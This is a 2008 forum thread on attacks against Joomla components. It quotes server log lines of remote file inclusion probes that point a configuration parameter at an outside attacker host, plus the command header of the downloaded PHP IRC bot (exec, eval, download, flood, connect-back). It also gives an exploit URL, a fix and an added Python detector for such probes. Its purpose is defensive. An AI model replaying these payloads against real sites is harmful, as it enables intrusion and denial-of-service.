Joomla new hacks

Bule

Here are some new ones:

67.15.179.3 - - [05/Nov/2008:13:55:14 +0200] "GET /components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.cr578.com/tx.txt??? HTTP/1.1" 500 933 "-" "libwww-perl/5.814"
77.222.40.189 - - [06/Nov/2008:04:29:51 +0200] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.cr578.com/tx.txt??? HTTP/1.1" 500 933 "-" "libwww-perl/5.803"
77.222.40.189 - - [06/Nov/2008:05:13:10 +0200] "GET /components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://www.cr578.com/tx.txt??? HTTP/1.1" 500 933 "-" "libwww-perl/5.803"

So, if anybody uses any of those components ...
 
This is why I don't use open source software </sarcasm>

There is probably already a patch available to resolve this.

Quite an interesting script that it downloads. Appears to be able to download new content, send mail and do DoS attacks. What else could a script-kiddie want...

Code:
/*
 *
 *  #crew@corp. since 2003
 *  edited by: devil__ and MEIAFASE <[email protected]> <[email protected]>
 *  Friend: LP <****[email protected]>
 *  COMMANDS:
 *
 *  .user <password> //login to the bot
 *  .logout //logout of the bot
 *  .die //kill the bot
 *  .restart //restart the bot
 *  .mail <to> <from> <subject> <msg> //send an email
 *  .dns <IP|HOST> //dns lookup
 *  .download <URL> <filename> //download a file
 *  .exec <cmd> // uses exec() //execute a command
 *  .sexec <cmd> // uses shell_exec() //execute a command
 *  .cmd <cmd> // uses popen() //execute a command
 *  .info //get system information
 *  .php <php code> // uses eval() //execute php code
 *  .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack
 *  .udpflood <target> <packets> <packetsize> <delay> //udpflood attack
 *  .raw <cmd> //raw IRC command
 *  .rndnick //change nickname
 *  .pscan <host> <port> //port scan
 *  .safe  // test safe_mode (dvl)
 *  .inbox <to> // test inbox (dvl)
 *  .conback <ip> <port> // conect back (dvl)
 *  .uname // return shell's uname using a php function (dvl)
 *
 */
 
Well, open source is the root of all evil. If every South African (including the poorest, newborns ...) gives $$$$ or RRRR to Bill, the world will be a much better place for Bill but slightly worse for us.

Apparently there is a fix for colorlab:

Wrong Code:
include( "$mosConfig_live_site/components/com_color/about.html" );

--------------------

Exploit:
/administrator/components/com_color/admin.color.php?mosConfig_live_site=shell?

--------------------

How to Fix:
1-open admin.color.php
2-write this code before the wrong code

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

3-save and exit
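
A log check for the probes quoted in the first post, as an added example that is not part of the original thread: it flags any request that passes a remote URL in a `mosConfig_*` query parameter. The sample lines are constructed (documentation IP ranges, example.com host) and modelled on the entries above; the name `find_rfi_probes` is illustrative.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache combined log format, as in the entries quoted in the thread.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# Configuration variables have no business in a query string, least of all
# holding a remote URL that a vulnerable include() would then fetch.
REMOTE_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

def find_rfi_probes(lines):
    """Return one dict per mosConfig_* parameter that carries a remote URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format: skip rather than guess
        parts = urlsplit(m.group("target"))
        # parse_qsl percent-decodes, so encoded schemes (%68ttp://) are caught
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if name.startswith("mosConfig_") and REMOTE_RE.match(value):
                hits.append({
                    "ip": m.group("ip"),
                    "path": parts.path,
                    "param": name,
                    "remote": value.rstrip("?"),  # drop the trailing ??? padding
                    "status": int(m.group("status")),
                    "ua": m.group("ua"),
                })
    return hits

# Constructed sample input: three probes and one ordinary request.
SAMPLE = [
    '192.0.2.10 - - [05/Nov/2008:13:55:14 +0200] "GET /components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://files.example.com/tx.txt??? HTTP/1.1" 500 933 "-" "libwww-perl/5.814"',
    '198.51.100.7 - - [06/Nov/2008:04:29:51 +0200] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://files.example.com/tx.txt??? HTTP/1.1" 500 933 "-" "libwww-perl/5.803"',
    '198.51.100.7 - - [06/Nov/2008:05:13:10 +0200] "GET /components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=%68ttp://files.example.com/tx.txt??? HTTP/1.1" 500 933 "-" "libwww-perl/5.803"',
    '203.0.113.5 - - [06/Nov/2008:06:00:00 +0200] "GET /index.php?option=com_content&return=http://www.example.com/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_rfi_probes(SAMPLE):
        print(hit["ip"], hit["status"], hit["path"], hit["param"], hit["remote"])
```

A hit with a 2xx or 3xx status deserves a closer look than the 500s shown here, since it means the component file at least executed instead of failing outright.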
 